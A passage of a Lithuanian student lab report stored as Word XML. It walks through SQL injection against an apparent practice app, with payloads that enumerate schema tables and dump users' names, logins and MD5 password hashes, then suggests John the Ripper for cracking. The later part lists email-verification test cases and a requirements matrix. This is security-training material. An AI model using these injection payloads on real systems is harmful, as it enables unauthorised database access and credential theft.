        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Surname: Smith</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or 0=0 union select null, user()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 xml:space="preserve">Surname: </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>root@localhost</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Bandom išsiaiškinti, kokios lentelės yra duomenų bazėje: %' and 1=0 union select null, table_name from information_schema.tables #</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Gaunam</w:t>
      </w:r>
      <w:r w:rsidR="008F2FA8">
        <w:t>e visą</w:t>
      </w:r>
      <w:r w:rsidR="00344469">
        <w:t xml:space="preserve"> s</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">ąrašą. Bandome išsiaiškinti visas lenteles su vartotojų duomenimis, tokios yra keturios: </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">%' and 1=0 union select null, table_name from information_schema.tables where table_name like 'user%'# </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ID: %' and 1=0 union select null, table_name from information_schema.tables where table_name like 'user%'#</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 xml:space="preserve">Surname: </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>users</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table_name from information_schema.tables where table_name like 'user%'#</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 xml:space="preserve">Surname: </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>USER_PRIVILEGES</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table_name from information_schema.tables where table_name like 'user%'#</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 xml:space="preserve">Surname: </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>USER_STATISTICS</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table_name from information_schema.tables where table_name like 'user%'#</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 xml:space="preserve">Surname: </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>user</w:t>
      </w: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Išsi</w:t>
      </w:r>
      <w:r w:rsidR="008F2FA8">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>aiškinam vis</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>us stulpelius „users“ lentelėje: %' and 1=0 union select null, concat(table_name,0x0a,column_name) from information_schema.columns where table_name = 'users' #</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Stulpelių „users“ lentelėje yra </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">10. </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Mus domina tokie stulpeliai kaip „user_id“, „first_name“, „last_name“, „user“, „password“.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Bandom išvesti į ekraną, visą tų stulpelių turinį: %' and 1=0 union select null, concat(first_name,0x0a,last_name,0x0a,user,0x0a,password) from users #</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ID: %' and 1=0 union select null, concat(first_name,0x0a,last_name,0x0a,user,0x0a,password) from users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Surname: admin</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>admin</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>admin</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>5f4dcc3b5aa765d61d8327deb882cf99</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lastRenderedPageBreak/>
        <w:t>ID: %' and 1=0 union select null, concat(first_name,0x0a,last_name,0x0a,user,0x0a,password) from users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Surname: Gordon</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Brown</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>gordonb</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>e99a18c428cb38d5f260853678922e03</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concat(first_name,0x0a,last_name,0x0a,user,0x0a,password) from users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Surname: Hack</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Me</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>1337</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>8d3533d75ae2c3966d7e0d4fcc69216b</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concat(first_name,0x0a,last_name,0x0a,user,0x0a,password) from users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Surname: Pablo</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Picasso</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pablo</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>0d107d09f5bbe40cade3de5c71e9e9b7</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ID: %' and 1=0 union select null, concat(first_name,0x0a,last_name,0x0a,user,0x0a,password) from users #</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">First name: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Surname: Bob</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Smith</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>smithy</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>5f4dcc3b5aa765d61d8327deb882cf99</w:t>
      </w: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 xml:space="preserve">Čia baigiasi šios užduoties apimtis. Gavome slaptažodžio užkoduotą eilutę (ang. hash). Norėdami ją atkoduoti, turime naudotis kitais įrankiais, pvz. </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>John the ripper</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00883D39" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00E350EA" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E350EA" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>užduotis.</w:t>
      </w:r>
      <w:r w:rsidR="00A63EF8" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E350EA" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>DARBO LAIKO PLANAVIMAS IR ATASKAITOS</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>a)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>TC1: Sukurti naują vartotojo paskyrą, patikrinti, ar vartotojas gali pilnavertiškai naudotis paskyra, be el. pašto patvirtinimo -&gt; Vartotojas gali sukurti paskyrą, tačiau negali ja pilnavertiškai naudotis kol el. paštas nepatvirtintas.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>TC2: Sukurti naują vartotojo paskyrą, iškart pasitvirtinti el. paštą -&gt; Vartotojas turi gebėt</w:t>
      </w:r>
      <w:r w:rsidR="00215B77" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">i pilnavertiškai naudotis savo </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidR="00215B77" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>skyra.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>TC3: Sukurti naują vartotojo paskyrą, netvirtinti el</w:t>
      </w:r>
      <w:r w:rsidR="009D095E" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>. pašto. P</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>atikrinti, ar vartotojas gali pasitvirtinti el. paštą, kai pr</w:t>
      </w:r>
      <w:r w:rsidR="009D095E" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>aeina  24 val. nuo paskyros sukū</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>rimo laik</w:t>
      </w:r>
      <w:r w:rsidR="00215B77" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>o -&gt; po 24 val nuo paskyros sukū</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>rimo, vartotojas neturi gebėti pasitvirtinti el. paštą. Paskyra ištrinama iš sistemos.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>TC4: Sukurti naują vartotojo paskyrą,  pasitvirtinti el. paštą, kai praeina 23 val -&gt; vartotojas turi gebėti pasitvirtinti el. pašto adresą.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>TC</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:t>5:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> Sukurti naują vartotojo paskyrą, netvirtinti el. pašto. Patikrinti, ar vartotojas gauna priminimą apie el. pašto patvirtinimą, po </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:t>12 val. nuo paskyros sukūrimo.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E350EA" w:rsidRPr="00AD4464" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>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2"/>
        <w:gridCol w:w="1642"/>
        <w:gridCol w:w="1642"/>
        <w:gridCol w:w="1642"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E350EA" w:rsidRPr="00AD4464" w:rsidTr="00E350EA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="16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397" w:name="_Toc14392589"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>R1</w:t>
            </w:r>
            <w:bookmarkEnd w:id="397"/>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398" w:name="_Toc14392590"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>R2</w:t>
            </w:r>
            <w:bookmarkEnd w:id="398"/>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399" w:name="_Toc14392591"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>R3</w:t>
            </w:r>
            <w:bookmarkEnd w:id="399"/>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0" w:name="_Toc14392592"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>R4</w:t>
            </w:r>
            <w:bookmarkEnd w:id="400"/>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1" w:name="_Toc14392593"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>R5</w:t>
            </w:r>
            <w:bookmarkEnd w:id="401"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E350EA" w:rsidRPr="00AD4464" w:rsidTr="00E350EA">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en-US"/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="402" w:name="_Toc14392594"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>TC1 (prio 1)</w:t>
            </w:r>
            <w:bookmarkEnd w:id="402"/>
          </w:p>
        </w:tc>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3" w:name="_Toc14392595"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>x</w:t>
            </w:r>
            <w:bookmarkEnd w:id="403"/>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r>
      <w:tr w:rsidR="00E350EA" w:rsidRPr="00AD4464" w:rsidTr="00E350EA">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4" w:name="_Toc14392596"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>TC2 (prio 1)</w:t>
            </w:r>
            <w:bookmarkEnd w:id="404"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="16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5" w:name="_Toc14392597"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>x</w:t>
            </w:r>
            <w:bookmarkEnd w:id="405"/>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6" w:name="_Toc14392598"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>x</w:t>
            </w:r>
            <w:bookmarkEnd w:id="406"/>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r>
      <w:tr w:rsidR="00E350EA" w:rsidRPr="00AD4464" w:rsidTr="00E350EA">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7" w:name="_Toc14392599"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>TC3 (prio 1)</w:t>
            </w:r>
            <w:bookmarkEnd w:id="407"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="16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8" w:name="_Toc14392600"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>x</w:t>
            </w:r>
            <w:bookmarkEnd w:id="408"/>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09" w:name="_Toc14392601"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>x</w:t>
            </w:r>
            <w:bookmarkEnd w:id="409"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E350EA" w:rsidRPr="00AD4464" w:rsidTr="00E350EA">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10" w:name="_Toc14392602"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>TC4 (prio 2)</w:t>
            </w:r>
            <w:bookmarkEnd w:id="410"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="16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11" w:name="_Toc14392603"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>x</w:t>
            </w:r>
            <w:bookmarkEnd w:id="411"/>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r>
      <w:tr w:rsidR="00E350EA" w:rsidRPr="00AD4464" w:rsidTr="00E350EA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="164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12" w:name="_Toc14392604"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
